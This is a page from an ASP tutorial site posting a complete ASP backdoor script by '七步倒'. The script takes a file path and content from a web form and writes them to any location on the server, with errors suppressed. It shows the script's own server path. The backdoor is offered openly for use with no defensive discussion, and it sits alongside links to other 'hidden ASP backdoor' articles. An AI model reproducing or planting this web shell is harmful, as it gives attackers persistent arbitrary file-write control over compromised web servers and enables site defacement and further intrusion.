- <html>
- <head>
- <title>七步倒┈→專用asp后門</title>
- </head>
- </html>
- <%dim objFSO%>
- <%dim fdata%>
- <%dim objCountFile%>
- <%on error resume next%>
- <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
- <%if Trim(request("syfdpath"))<>"" then%>
- <%fdata = request("cyfddata")%>
- <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
- <%objCountFile.Write fdata%>
- <%if err =0 then%>
- <%response.write "<font color=blue>Save Success!</font>"%>
- <%else%>
- <%response.write "<font color=red>Save UnSuccess!</font>"%>
- <%end if%>
- <%err.clear%>
- <%end if%>
- <%objCountFile.Close%>
- <%Set objCountFile=Nothing%>
- <%Set objFSO = Nothing%>
- <%Response.write "<form action='''' method=post>"%>
- <%Response.write "<font color=blue>save file絕對路徑:</font>"%>
- <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>
- <%Response.Write "<br>"%>
- <%Response.write "<font color=red>file of 絕對路徑"%>
- <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
- <%Response.write "<br>"%>
- <%Response.write "input:"%>
- <%Response.write "<textarea name=cyfddata cols=80 rows=10
- width=50></textarea>"%>
- <%Response.write "<input type=submit value=save>"%>
- <%Response.write "</form>"%>
- BY:七步倒
七步倒┈→專用asp后門
2019-10-14 11:26七步倒 ASP教程
七步倒┈→專用asp后門
延伸 · 閱讀
- 2019-09-29幾種另類的ASP后門
- 2019-09-16最小asp后門程序
- 2019-09-02隱蔽的ASP后門 大家可以查看下
精彩推薦
- ASP教程
JScript中遍歷Request表單參數集合的方法
這篇文章主要介紹了JScript中遍歷Request表單參數集合的方法,本文以遍歷Request.QueryString集合為例給出了實現代碼,需要的朋友可以參考下...
- ASP教程
asp之基于adodb.stream的文件操作類
asp之基于adodb.stream的文件操作類...
- ASP教程
asp 采集實戰代碼
最近實在是太流行采集了,本人是不喜歡采集的,但對采集的原理我卻很有興趣進行研究,拿到了網上采集常用函數,對其進行了一番研究,并實戰,結果...
- ASP教程
ASP.NET 數據源
數據源 一個 data sourse 控件與數據綁定的控件相互作用,并隱藏了復雜的數據的聯編過程。這些是提供數據給 data bound 控件的工具,并且支持如插入,刪除...
- ASP教程
asp+javascript實現404頁的處理轉換
asp+javascript實現404頁的處理轉換...
- ASP教程
ASP常用函數:getpy()
ASP常用函數:getpy()...
- ASP教程
asp 標記字符串中指定字符變色不區分大小寫
今天遇到這種問題,單純的使用replace函數不行,他會改變原有的字符串的大小寫,在網上找到相關的代碼,自己備份下...
- ASP教程
asp Access數據備份,還原,壓縮類代碼
asp Access數據備份,還原,壓縮類實現代碼,大家可以參考下。...